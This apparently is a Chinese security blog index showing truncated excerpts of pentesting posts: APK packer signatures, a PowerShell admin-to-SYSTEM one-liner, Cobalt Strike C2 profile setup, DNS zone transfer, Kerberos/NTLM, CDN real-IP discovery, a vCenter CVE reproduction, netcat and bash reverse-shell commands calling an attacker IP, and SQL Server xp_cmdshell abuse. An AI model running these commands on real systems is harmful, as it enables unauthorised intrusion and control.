APK查壳原理
对于加了壳的apk,包里面会有一些符合特定特征的文件,比较简单的方式就是通过检测apk是否符合这些特征,当然随着各大加固平台不断的迭代,其特征也可能会不断的迭代。
我们只需要知道大概原理就可以了,常见的特征判断是判断lib下是否存在特定的so文件。以下根据各个业界大佬的帖子总结的相关特征文件。
“libnqshield.so”———- “国信灵通”
“libvenSec.so”———- “启明星辰”
“libvenustech.so”———- “启明星辰”
“libchaosvmp.so”———- “娜迦加固”
“libddog.so”———- “娜迦加固”
“libfdog.so”———- “娜迦加固”
“libedog.so”———- “娜迦加固(企业版)”
“libexec.so”———- “爱加密”
“libexecmain.so”———- “爱加密”
“ijiami.dat”———- “爱加密”
“ijiami.ajm”———- “爱加密”
“libsecexe.so”———- “梆梆安全”
“libsecmain.so”———- “梆梆 ...
Windows10一句话从administrator权限提升到system权限
1powershell -ep bypass "Install-Module -Name NtObjectManager;start-Win32ChildProcess cmd"
系统CLSID
简介CLSID是指windows系统对于不同的应用程序,文件类型,OLE对象,特殊文件夹以及各种系统组件分配一个唯一表示它的ID代码,用于对其身份的标示和与其他对象进行区分。CLSID像人身份证一样,是个类的唯一标识:
常见组件类的CLSID我的文档:450D8FBA-AD25-11D0-98A8-0800361B1103
我的电脑:20D04FE0-3AEA-1069-A2D8-08002B30309D
控制面板:21EC2020-3AEA-1069-A2DD-08002B30309D
CLSID的小应用1.调用CLSID打开打开系统文件夹
打开我的电脑
win+r 在运行框中输入 ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
打开回收站
win+r 在运行框中输入 ::{645FF040-5081-101B-9F08-00AA002F954E}
2.通过CLSID来简单加密文件夹
新建一个文件夹,将其扩展名改为系统对应CLSID的扩展名,该文件夹就会变成了对应的系统图标,并且打开此文件夹与打开系统文件夹是一样的操作,也就是其中放 ...
配置超强C2-profile文件
1.生成免费的ssl证书,弃用cobaltstrike.store,用自己的mysec.store
命令生成store文件:
1keytool -genkey -alias mysec -keyalg RSA -validity 36500 -keystore mysec.store
注意记得-alias后面的参数和-keystore后面的参数后面会用到C2-profile里面,接下来需要输入密码,一定要记得这串密码,后面会用到,不然到时候你需要自己回来重新生成下然后输入名字,例如:US 然后一步步输入就行最后这里输入y即可完成 然后再输入一次密码即可ls查看当前目录就生成好了zzhsec.store文件
创建修改C2-profile文件
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081set sample_ ...
域传送
DNS分类
A记录 ip地址记录 一个域名对应的IP地址
CNAME 记录一个主机的别名
MX记录 记录邮件域名对应的 IP
NS记录 记录该域名由哪台服务器解析
PTR记录 反向记录 ,从IP地址到域名的一条的记录
DNS域传送
DNS服务器分为:主服务器、备份服务器和缓存服务器。在主备服务器之间同步数据库,需要使用“DNS域传送”。域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。
检测方式
(1) 使用 nslookup
123456789C:\Users\lj>nslookup默认服务器: UnKnownAddress: 211.82.100.1> server dns1.thnu.edu.cn默认服务器: dns1.thnu.edu.cnAddress: 125.223.168.5> ls thnu.edu.cn
(2) 使用dig请求
axfr 是q-type类型的一种,指请求传送某个区域的全部记录。
我们只要欺骗dns服务器发送一个axfr请求过去, 如果该dns服务器上存在该漏洞,就会返回所有 ...
彻底理解Kerberos
本地的账号认证
当我们登陆系统的时候,系统会把摄入的密码和%SystemRoot%/system32/config/sam文件进行比对,我们的密码在SAM文件中以NTLM hash的形式存储。用户登录的时候,会将输入的密码已hash的格式进行加密,与本地的sam中的hash进行比对
NTML HASH生成过程
先将数据进行hex编码
再将hex编码转为unicode编码
再将unicode编码的数据进行MD4加密
本地认证流程
开机后,winlogon.exe进程接收用户输入的信息,然后由lsass.exe将密码进行加密,读取用户的用户名和密码进行比对
SMB文件共享协议的作用只是在文件的操作,认证走的是NTLM协议,windows内部广泛使用的是NTLM协议,其他的一些工具可以依赖NTLM认证协议
NTML协商过程
第一步:协商
客户机在这一步向服务器确认协议版本
第二部: 质询
客户端向服务端发送包括用户名在内的用户信息
服务器接收到之后,生成一个16位的随机数,称为challenge,使用存在SAM文件中的该用户名所对应的NTML HASH对challeng进行 ...
查找cdn背后的真实IP(简单易用)
1.域名解析过程
传统访问: 用户访问域名 –> 解析IP –> 访问目标主机
简单模式: 用户访问域名 – >cdn节点 –> 真实IP
waf:用户访问域名 –> cdn节点(waf) –> 真实IP –>目标主机
2.检测CDN网站:
1https://wepcc.com/
1http://ping.chinaz.com
3.查找真实IP
查看DNS历史解析记录
1https://webiplookup.com
1https://viewdns.info/iphistory
1https://ipchaxun.com/
Censys查询SSL证书找到真实IP
在网站查找证书的指纹,然后在crt.sh网站上查找该证书的指纹,找到该指纹对应的sha256,然后在censys.io上查找该sha256值所对应的的ip
VMware vCenter Server任意文件上传漏洞(CVE-2021-22005)复现
漏洞描述2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。
其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8。能够网络访问vCenter Server 上的 443 端口的攻击者可以通过上传恶意文件在 vCenter Server 上远程执行代码。该漏洞无需经过身份验证即可远程利用,攻击复杂度低,且无需用户交互。
根据Shodan的搜索结果,数以千计的vCenter Server可通过互联网访问并受到攻击 。目前已经检测到攻击者正在扫描和攻击存在漏洞的VMware vCenter 服务器。
影响版本
VMware vCenter Server 7.0
VMware vCenter Server 6.7
注:CVE-2021-22005会影响所有默认配置的 vCenter Server 6.7 和 7.0 部署,不会影响 vCenter Serv ...
反弹Shell小结
1.netcat反弹shell由于出于安全考虑,原生版本的netcat反弹本地shell的功能参数 -e 都被阉割了,所以我们可以自己手动下载二进制安装包,安装的如下:
12345wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gztar -xvzf netcat-0.7.1.tar.gz./configuremake && make installmake clean
安装完原生版本的 netcat 工具后,便有了netcat -e参数,我们就可以将本地bash反弹到攻击机上了。
攻击机开启监听
1nc -lvp 2333
目标主机主动连接
12nc 47.xxx.xxx.72 2333 -e /bin/bash# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash
2 利用bash反弹shell反弹shell最好的方法就是使用bash结合重定向方法的一句话,具体命令如下:
1234bash -i > ...
SQL SERVER常见的渗透测试方法
前置知识默认端口:1433(Server 数据库服务) 1434(Monitor 数据库监控) 2433(ms-sql-hidden 2433/tcp)
渗透方法1.弱口令
Msf或者Scansql扫描器扫描SA用户空/弱口令,获得口令后进行相关渗透操作。以sa的身份通过navicat连接sql server执行相关命令。包括:
使用xp_cmdshell扩展存储过程执行操作系统的命令;
利用xp_regread扩展存储过程去读注册表的键值,当然包括SAM键;
使用“bulk insert”语法去读服务器上的任意文件;
使用sp_OACreate、sp_OAMethod和sp_OAGetProperty系统存储过程去创建ActiveX应用程序等
登录成功后,执行命令查看版本
1select @@version
验证是否是sa权限
1select IS_SRVROLEMEMBER('sysadmin')
返回1,说明是sa权限,可以执行sql语句
判断是否存在xp_cmdshell扩展存储过程:
1select count(*) from master.d ...

